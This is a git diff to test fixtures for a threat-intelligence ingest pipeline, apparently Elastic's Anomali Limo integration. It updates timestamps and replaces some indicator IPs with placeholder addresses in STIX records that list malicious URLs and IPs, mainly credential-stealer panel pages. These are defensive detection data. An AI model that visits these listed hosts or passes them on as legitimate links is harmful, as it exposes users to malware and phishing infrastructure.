http://92.63.197.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.191/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} +{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} {"created":"2020-02-25T02:55:27.523Z","description":"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:27.523Z","name":"mal_url: http://farsson.com/~zadmin/3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/3/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:27.523Z"} {"created":"2020-02-25T02:55:35.424Z","description":"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-25T02:55:35.424Z","name":"mal_url: http://atomicwallet.email/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atomicwallet.email/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.424Z"} -{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: http://190.97.162.37/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.97.162.37/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} +{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} {"created":"2020-02-25T02:55:35.496Z","description":"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--1163cdee-566a-404a-b66e-657857eb4af3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:55:35.496Z","name":"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.496Z"} -{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 195.133.201.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.133.201.191']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} +{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json index 121ce28f55d..123f0a43007 100644 --- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json +++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json @@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385010143Z", + "ingested": "2021-12-13T08:38:40.022544100Z", "original": "{\"created\":\"2020-01-22T02:58:57.431Z\",\"description\":\"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:58:57.431Z\",\"name\":\"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.431Z\"}", "category": "threat", "type": "indicator", @@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385038717Z", + "ingested": "2021-12-13T08:38:40.022557600Z", "original": "{\"created\":\"2020-01-22T02:58:57.503Z\",\"description\":\"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:58:57.503Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.503Z\"}", "category": "threat", "type": "indicator", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385046762Z", + "ingested": "2021-12-13T08:38:40.022562300Z", "original": "{\"created\":\"2020-01-22T02:58:57.57Z\",\"description\":\"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0e14122-9005-4776-99fc-00872476c6d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-22T02:58:57.57Z\",\"name\":\"mal_url: http://f0387770.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387770.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.57Z\"}", "category": "threat", "type": "indicator", @@ -161,7 +161,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://178.62.187.103/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", "modified": "2020-01-22T02:58:59.366Z", "valid_from": "2020-01-22T02:58:59.366Z", @@ -185,16 +185,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://178.62.187.103/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "178.62.187.103", - "full": "http://178.62.187.103/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385052202Z", - "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://178.62.187.103/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://178.62.187.103/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", + "ingested": "2021-12-13T08:38:40.022569300Z", + "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -245,7 +245,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385056961Z", + "ingested": "2021-12-13T08:38:40.022574800Z", "original": "{\"created\":\"2020-01-22T02:58:59.457Z\",\"description\":\"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--189ce776-6d7e-4e85-9222-de5876644988\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T02:58:59.457Z\",\"name\":\"mal_url: http://appareluea.com/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.457Z\"}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385061359Z", + "ingested": "2021-12-13T08:38:40.022580800Z", "original": "{\"created\":\"2020-01-22T02:59:06.402Z\",\"description\":\"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a4144d34-b86d-475e-8047-eb46b48ee325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T02:59:06.402Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:06.402Z\"}", "category": "threat", "type": "indicator", @@ -316,7 +316,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.144.128.116", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", "modified": "2020-01-22T02:59:19.990Z", "valid_from": "2020-01-22T02:59:19.99Z", @@ -338,12 +338,12 @@ "first_seen": "2020-01-22T02:59:19.990Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.144.128.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385065617Z", - "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 162.144.128.116\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.144.128.116']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", + "ingested": "2021-12-13T08:38:40.022585800Z", + "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -394,7 +394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385070016Z", + "ingested": "2021-12-13T08:38:40.022589700Z", "original": "{\"created\":\"2020-01-22T02:59:20.155Z\",\"description\":\"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-22T02:59:20.155Z\",\"name\":\"mal_url: http://ntrcgroup.com/nze/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:20.155Z\"}", "category": "threat", "type": "indicator", @@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385074584Z", + "ingested": "2021-12-13T08:38:40.022595Z", "original": "{\"created\":\"2020-01-22T02:59:25.521Z\",\"description\":\"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:59:25.521Z\",\"name\":\"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.521Z\"}", "category": "threat", "type": "indicator", @@ -497,7 +497,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385079022Z", + "ingested": "2021-12-13T08:38:40.022602600Z", "original": "{\"created\":\"2020-01-22T02:59:25.626Z\",\"description\":\"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:59:25.626Z\",\"name\":\"mal_url: http://f0390764.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390764.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.626Z\"}", "category": "threat", "type": "indicator", @@ -516,7 +516,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.143.138.39", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-22T02:59:36.461Z", "valid_from": "2020-01-22T02:59:36.461Z", @@ -538,12 +538,12 @@ "first_seen": "2020-01-22T02:59:36.461Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.143.138.39" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385083130Z", - "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 45.143.138.39\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.143.138.39']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", + "ingested": "2021-12-13T08:38:40.022609900Z", + "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385087629Z", + "ingested": "2021-12-13T08:38:40.022646200Z", "original": "{\"created\":\"2020-01-22T02:59:41.193Z\",\"description\":\"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-22T02:59:41.193Z\",\"name\":\"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.193Z\"}", "category": "threat", "type": "indicator", @@ -613,7 +613,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://95.182.122.184/", + "name": "mal_url: http://89.160.20.156/", "description": "TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime", "modified": "2020-01-22T02:59:41.228Z", "valid_from": "2020-01-22T02:59:41.228Z", @@ -637,16 +637,16 @@ "provider": "CyberCrime", "url": { "path": "/", - "original": "http://95.182.122.184/", + "original": "http://89.160.20.156/", "scheme": "http", - "domain": "95.182.122.184", - "full": "http://95.182.122.184/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385092087Z", - "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://95.182.122.184/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://95.182.122.184/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", + "ingested": "2021-12-13T08:38:40.022651100Z", + "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://89.160.20.156/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -664,7 +664,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 198.54.115.121", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-01-22T02:59:51.313Z", "valid_from": "2020-01-22T02:59:51.313Z", @@ -686,12 +686,12 @@ "first_seen": "2020-01-22T02:59:51.313Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "198.54.115.121" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385098619Z", - "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 198.54.115.121\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '198.54.115.121']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", + "ingested": "2021-12-13T08:38:40.022654800Z", + "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -709,7 +709,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.185.119.172", + "name": "mal_ip: 192.168.119.172", "description": "TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-22T02:59:51.372Z", "valid_from": "2020-01-22T02:59:51.372Z", @@ -731,12 +731,12 @@ "first_seen": "2020-01-22T02:59:51.372Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.185.119.172" + "ip": "192.168.119.172" } }, "event": { - "ingested": "2021-12-13T05:57:34.385104380Z", - "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.185.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.185.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", + "ingested": "2021-12-13T08:38:40.022660300Z", + "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.168.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385109309Z", + "ingested": "2021-12-13T08:38:40.022666400Z", "original": "{\"created\":\"2020-01-22T02:59:51.442Z\",\"description\":\"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:51.442Z\",\"name\":\"mal_url: http://f0389246.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0389246.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.442Z\"}", "category": "threat", "type": "indicator", @@ -838,7 +838,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385114439Z", + "ingested": "2021-12-13T08:38:40.022671300Z", "original": "{\"created\":\"2020-01-22T03:00:01.563Z\",\"description\":\"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--213519c9-f511-4188-89c8-159f35f08008\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T03:00:01.563Z\",\"name\":\"mal_url: http://appareluea.com/server/cp.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/server/cp.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:01.563Z\"}", "category": "threat", "type": "indicator", @@ -890,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385118817Z", + "ingested": "2021-12-13T08:38:40.022675600Z", "original": "{\"created\":\"2020-01-22T03:00:03.138Z\",\"description\":\"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:00:03.138Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot2/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.138Z\"}", "category": "threat", "type": "indicator", @@ -942,7 +942,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385123376Z", + "ingested": "2021-12-13T08:38:40.022681200Z", "original": "{\"created\":\"2020-01-22T03:00:03.396Z\",\"description\":\"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:03.396Z\",\"name\":\"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 